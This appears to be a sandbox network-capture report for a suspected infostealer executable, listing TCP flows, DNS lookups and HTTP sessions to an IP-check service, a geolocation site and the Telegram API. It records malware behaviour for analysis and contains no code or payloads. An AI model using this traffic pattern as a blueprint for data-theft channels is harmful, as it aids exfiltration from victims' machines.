                                                                                                          Jan 11, 2025 03:06:43.280996084 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.281339884 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.281358957 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.329308033 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:43.904056072 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.905780077 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.905813932 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.905873060 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.905895948 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.177551031 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.177645922 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.177707911 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:44.199424028 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:44.520904064 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.521575928 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.526139021 CET8049761132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.526237011 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.526477098 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.526546955 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.526838064 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.531626940 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.796715021 CET8049713132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.798158884 CET4971380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:45.845668077 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.846973896 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:45.847012997 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.847075939 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:45.847382069 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:45.847393990 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.891799927 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.669894934 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.671683073 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.671696901 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.671751976 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.671758890 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.849107027 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.849194050 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.849271059 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.849790096 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.856251001 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.857055902 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.861269951 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.861341953 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.861845970 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.861910105 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.862025976 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.866744995 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.889677048 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.890942097 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:47.890976906 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.891208887 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:47.891514063 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:47.891525984 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.938683033 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.608517885 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.612454891 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.612484932 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.612555027 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.612566948 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.866168976 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.866250038 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.866617918 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.866942883 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.870392084 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.871546030 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.876193047 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.876250982 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.876351118 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.876408100 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.876497984 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.881208897 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.825568914 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.828707933 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:49.828751087 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.828851938 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:49.829143047 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:49.829154015 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.876211882 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.434844971 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.437148094 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.437175035 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.439366102 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.439385891 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.701338053 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.701406002 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.701551914 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.702119112 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.706160069 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.707484961 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.711170912 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.711297989 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.712297916 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.712393999 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.712588072 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.717365980 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.544471025 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.546312094 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:51.546365976 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.546444893 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:51.546823978 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:51.546834946 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.594932079 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.154125929 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.155997038 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.156017065 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.156086922 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.156095982 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.402120113 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.402192116 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.402504921 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.402822971 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.405715942 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.406831980 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.413146019 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.413958073 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.414024115 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.414062977 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.414118052 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.419513941 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.242187977 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.247042894 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.247092009 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.247344971 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.247724056 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.247740984 CET44349772149.154.167.220192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:05:21.900881052 CET | 65153 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:05:21.907567978 CET | 53 | 65153 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:05:23.301553011 CET | 61052 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:05:23.308876038 CET | 53 | 61052 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:05:27.245166063 CET | 49196 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:05:27.252181053 CET | 53 | 49196 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:05:28.897032976 CET | 61121 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:05:28.907454014 CET | 53 | 61121 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:05:35.251332045 CET | 59793 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:05:35.257931948 CET | 53 | 59793 | 1.1.1.1 | 192.168.2.10

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 03:05:21.900881052 CET | 192.168.2.10 | 1.1.1.1 | 0x8ef5 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:23.301553011 CET | 192.168.2.10 | 1.1.1.1 | 0xc454 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:27.245166063 CET | 192.168.2.10 | 1.1.1.1 | 0x613d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.897032976 CET | 192.168.2.10 | 1.1.1.1 | 0xa935 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:35.251332045 CET | 192.168.2.10 | 1.1.1.1 | 0x284f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 03:05:21.907567978 CET | 1.1.1.1 | 192.168.2.10 | 0x8ef5 | No error (0) | drive.google.com | | 142.250.181.238 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:23.308876038 CET | 1.1.1.1 | 192.168.2.10 | 0xc454 | No error (0) | drive.usercontent.google.com | | 142.250.186.33 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:27.252181053 CET | 1.1.1.1 | 192.168.2.10 | 0x613d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:05:27.252181053 CET | 1.1.1.1 | 192.168.2.10 | 0x613d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:27.252181053 CET | 1.1.1.1 | 192.168.2.10 | 0x613d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:27.252181053 CET | 1.1.1.1 | 192.168.2.10 | 0x613d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:27.252181053 CET | 1.1.1.1 | 192.168.2.10 | 0x613d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:27.252181053 CET | 1.1.1.1 | 192.168.2.10 | 0x613d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:28.907454014 CET | 1.1.1.1 | 192.168.2.10 | 0xa935 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:05:35.257931948 CET | 1.1.1.1 | 192.168.2.10 | 0x284f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49710 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:27.264302015 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 03:05:28.078248024 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:05:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 03:05:28.083086014 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 03:05:28.387295961 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 11, 2025 03:05:34.965766907 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 11, 2025 03:05:35.246803045 CET273INHTTP/1.1 200 OK
                                                                                                          Date: Sat, 11 Jan 2025 02:05:35 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49713 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:37.867239952 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 11, 2025 03:05:40.796513081 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:05:40 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49715 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:41.637671947 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:05:44.534039021 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:05:44 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49717 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:45.418610096 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:05:49.278007984 CET | 697 | IN | HTTP/1.1 504 Gateway Time-out
    Date: Sat, 11 Jan 2025 02:05:49 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49718 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:49.287935972 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:05:51.116115093 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:05:50 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49721 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:52.025201082 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:05:53.969919920 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:05:53 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49723 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:54.878374100 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:05:58.729590893 CET | 697 | IN | HTTP/1.1 504 Gateway Time-out
    Date: Sat, 11 Jan 2025 02:05:58 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
